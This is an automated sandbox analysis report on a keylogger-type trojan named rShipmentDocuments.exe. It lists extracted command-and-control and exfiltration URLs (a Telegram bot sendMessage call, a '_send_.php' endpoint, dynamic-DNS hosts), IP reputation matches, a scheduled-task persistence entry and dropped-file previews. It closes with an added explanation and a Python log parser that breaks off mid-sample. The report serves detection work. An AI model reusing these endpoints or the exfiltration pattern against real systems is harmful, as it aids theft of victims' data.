https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042E6000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.000000000316B000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004334000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004409000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004190000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004142000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text= | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.microsoft.c62 | ZOlmYtPdlO.exe, 00000010.00000002.4153230560.00000000068E0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.carterandcone.coml | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://aborters.duckdns.org:8081 | rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://51.38.247.67:8081/_send_.php?L | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000031E3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030DC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://anotherarmy.dns.army:8081 | rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003061000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                            http://www.jiyu-kobo.co.jp/rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://reallyfreegeoip.orgrShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4137543225.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4137318627.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers8rShipmentDocuments.exe, 00000000.00000002.1732905140.0000000007492000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesrShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003D42000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4144409501.0000000003CFA000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004192000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000043E4000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.0000000004148000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.000000000411D000.00000004.00000800.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 00000010.00000002.4144404261.00000000042EC000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedrShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, ZOlmYtPdlO.exe, 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
185.230.141.85 | unknown | Russian Federation | 59504 | HostingvpsvilleruRU | true
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1531471
Start date and time: 2024-10-11 09:34:20 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rShipmentDocuments.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@25/15@3/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 173
• Number of non-executed functions: 23
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for currently running targets with high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
03:35:11 | API Interceptor | 8594808x Sleep call for process: rShipmentDocuments.exe modified
03:35:14 | API Interceptor | 33x Sleep call for process: powershell.exe modified
03:35:16 | API Interceptor | 6465190x Sleep call for process: ZOlmYtPdlO.exe modified
08:35:14 | Task Scheduler | Run new task: ZOlmYtPdlO path: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | z76ik.exe | Get hash | malicious | MassLogger RAT | Browse |
149.154.167.220 | LOI SPECIFIFCATION.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | New Purchase Order Ref#0012573.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | Swift Payment.pdf.exe | Get hash | malicious | MassLogger RAT | Browse |
149.154.167.220 | SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | up7bJYQosk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | XbER2eIAaa.exe | Get hash | malicious | XWorm | Browse |
149.154.167.220 | SP0npSA64a.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | ZfzNdscQNj.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
149.154.167.220 | GYJ1zSOpOW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
185.230.141.85 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
185.230.141.85 | Bill of Lading.xls | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
188.114.96.3 | DRAFT DOC2406656.bat.exe | Get hash | malicious | Lokibot | Browse | touxzw.ir/sirr/five/fre.php
188.114.96.3 | lv961v43L3.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
188.114.96.3 | 10092024150836 09.10.2024.vbe | Get hash | malicious | FormBook | Browse | www.airgame.store/ojib/
188.114.96.3 | Hesap-hareketleriniz.exe | Get hash | malicious | FormBook | Browse | www.cc101.pro/59fb/
188.114.96.3 | octux.exe.exe | Get hash | malicious | Unknown | Browse | servicetelemetryserver.shop/api/index.php
188.114.96.3 | bX8NyyjOFz.exe | Get hash | malicious | FormBook | Browse | www.rtprajalojago.live/2uvi/
188.114.96.3 | lWfpGAu3ao.exe | Get hash | malicious | FormBook | Browse | www.serverplay.live/71nl/
188.114.96.3 | sa7Bw41TUq.exe | Get hash | malicious | FormBook | Browse | www.cc101.pro/0r21/
188.114.96.3 | E_receipt.vbs | Get hash | malicious | Unknown | Browse | paste.ee/d/VO2TX
188.114.96.3 | QUOTATION_OCTQTRA071244#U00faPDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | filetransfer.io/data-package/fOmsJ2bL/download
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
reallyfreegeoip.org | z76ik.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.97.3
reallyfreegeoip.org | z51NEWPO.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 188.114.97.3
reallyfreegeoip.org | LOI SPECIFIFCATION.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | New Purchase Order Ref#0012573.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | Swift Payment.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | up7bJYQosk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | SP0npSA64a.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
reallyfreegeoip.org | GYJ1zSOpOW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
reallyfreegeoip.org | Vn2TyKMJUW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.97.3
checkip.dyndns.com | z76ik.exe | Get hash | malicious | MassLogger RAT | Browse | 193.122.130.0
checkip.dyndns.com | z51NEWPO.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 158.101.44.242
checkip.dyndns.com | LOI SPECIFIFCATION.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | New Purchase Order Ref#0012573.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | Swift Payment.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 132.226.8.169
checkip.dyndns.com | SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.6.168
checkip.dyndns.com | up7bJYQosk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 193.122.130.0
checkip.dyndns.com | SP0npSA64a.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | GYJ1zSOpOW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 158.101.44.242
checkip.dyndns.com | Vn2TyKMJUW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 132.226.8.169
api.telegram.org | z76ik.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | LOI SPECIFIFCATION.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | New Purchase Order Ref#0012573.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | Swift Payment.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
api.telegram.org | SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | up7bJYQosk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | XbER2eIAaa.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220
api.telegram.org | SP0npSA64a.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
api.telegram.org | ZfzNdscQNj.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 149.154.167.220
api.telegram.org | GYJ1zSOpOW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | z76ik.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
TELEGRAMRU | LOI SPECIFIFCATION.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | New Purchase Order Ref#0012573.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | Swift Payment.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 149.154.167.220
TELEGRAMRU | SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | up7bJYQosk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | XbER2eIAaa.exe | Get hash | malicious | XWorm | Browse | 149.154.167.220
TELEGRAMRU | SP0npSA64a.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
TELEGRAMRU | ZfzNdscQNj.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 149.154.167.220
TELEGRAMRU | GYJ1zSOpOW.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
HostingvpsvilleruRU | SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 185.230.141.85
HostingvpsvilleruRU | Bill of Lading.xls | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 185.230.141.85
HostingvpsvilleruRU | LisectAVT_2403002A_149.exe | Get hash | malicious | Amadey | Browse | 80.76.42.67
HostingvpsvilleruRU | am.exe | Get hash | malicious | Amadey | Browse | 80.76.42.67
HostingvpsvilleruRU | a.exe | Get hash | malicious | Amadey | Browse | 80.76.42.67
HostingvpsvilleruRU | kdevtmpfsi | Get hash | malicious | Xmrig | Browse | 185.156.179.225
HostingvpsvilleruRU | x86.elf | Get hash | malicious | Unknown | Browse | 185.246.118.197
HostingvpsvilleruRU | arm7.elf | Get hash | malicious | Mirai | Browse | 185.246.118.198
HostingvpsvilleruRU | WKKdXepXFi.elf | Get hash | malicious | Mirai | Browse | 185.246.118.187
HostingvpsvilleruRU | c8O3JEibrM.elf | Get hash | malicious | Mirai | Browse | 185.246.118.178
CLOUDFLARENETUS | l0T55kCdTI.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8
CLOUDFLARENETUS | ATT4416530006_Swissquote.htm | Get hash | malicious | HTMLPhisher | Browse | 104.18.11.207
CLOUDFLARENETUS | curriculo_OUTUBRO_2024_Bmd2xZtsZtjm7sO_curriculo_091024.LnK.lnk | Get hash | malicious | Unknown | Browse | 172.67.200.173
CLOUDFLARENETUS | X_VISUALIZAR_MANDADO_0427384.LnK.lnk | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 104.21.53.8
CLOUDFLARENETUS | DRAFT DOC2406656.bat.exe | Get hash | malicious | Lokibot | Browse | 188.114.96.3
CLOUDFLARENETUS | YtpxPCS4ke.elf | Get hash | malicious | Mirai | Browse | 162.159.132.60
CLOUDFLARENETUS | View and Print Online.pdf | Get hash | malicious | Unknown | Browse | 104.18.95.41
CLOUDFLARENETUS | Order160311_Reference.hta | Get hash | malicious | Azorult | Browse | 104.21.14.133
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Variant.Lazy.153341.13263.18139.exe | Get hash | malicious | Unknown | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Variant.Lazy.153341.13263.18139.exe | Get hash | malicious | Unknown | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | z76ik.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | FMAudit.Installer_9652_1238001249.exe | Get hash | malicious | Unknown | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | z51NEWPO.exe | Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | LOI SPECIFIFCATION.pdf.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | New Purchase Order Ref#0012573.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | Swift Payment.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Win32.CrypterX-gen.28129.24663.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
54328bd36c14bd82ddaa0c04b25ed9ad | up7bJYQosk.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e | http://kale.amwebsolution.com/yuop/66c323e1543cd_ffrs.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://wav-installers.s3.amazonaws.com/Stubs/WaveBrowser_Stub-v1.5.18.3-wpf.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Kevin Burrell shared 'Team A Pictures and Presentation' in 'Eric Meyn's Workspace' with you.msg | Get hash | malicious | Unknown | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://www.canva.com/design/DAGTGtfEYnw/CziuYyD8EEWyTr61OD4BbQ/edit?utm_content=DAGTGtfEYnw&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutto | Get hash | malicious | HtmlDropper | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 36.msi | Get hash | malicious | Numando | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 33.msi | Get hash | malicious | Numando | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | QbAwyjyAk3.lnk | Get hash | malicious | Numando | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | btm4e0L3pw.lnk | Get hash | malicious | Numando | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 26.msi | Get hash | malicious | Numando | Browse | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Untitled.eml | Get hash | malicious | HTMLPhisher | Browse | 149.154.167.220
No context
                                                    Process:C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    Process:C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
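The two entries above are the CLR's per-executable usage log: a two-record header (`1,"fusion","GAC",0` and `1,"WinRT","NotApp",1`) followed by one record per assembly the process bound, with the NGEN native-image path where one was used. The CLR writes this file under the user's profile (`%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\<exe>.log` for a 32-bit process) for every .NET executable that runs, so it remains as proof of execution and of the dependency set (here WinForms, Drawing, Configuration, Core and Xml) after the binary itself is gone. The parser below is an added example, not part of the Joe Sandbox report; its sample log is constructed from the preview above (the System.Xml record is left out because the preview truncates it mid-path), and the reading of the record kinds (1 = setting, 2 = bind without a native image, 3 = bind with the native-image path in the third field) is inferred from the sample rather than taken from a published specification.

```python
"""Parse a CLR usage log in the format previewed above.

Added example, not part of the Joe Sandbox report. SAMPLE_LOG is constructed
from the report's preview; the on-disk file uses CRLF line endings, which
splitlines() also accepts. The meaning of the kind column is inferred from the
sample, not from a specification.
"""
import csv

# Constructed from the preview above; the truncated System.Xml record is omitted.
SAMPLE_LOG = r'''1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
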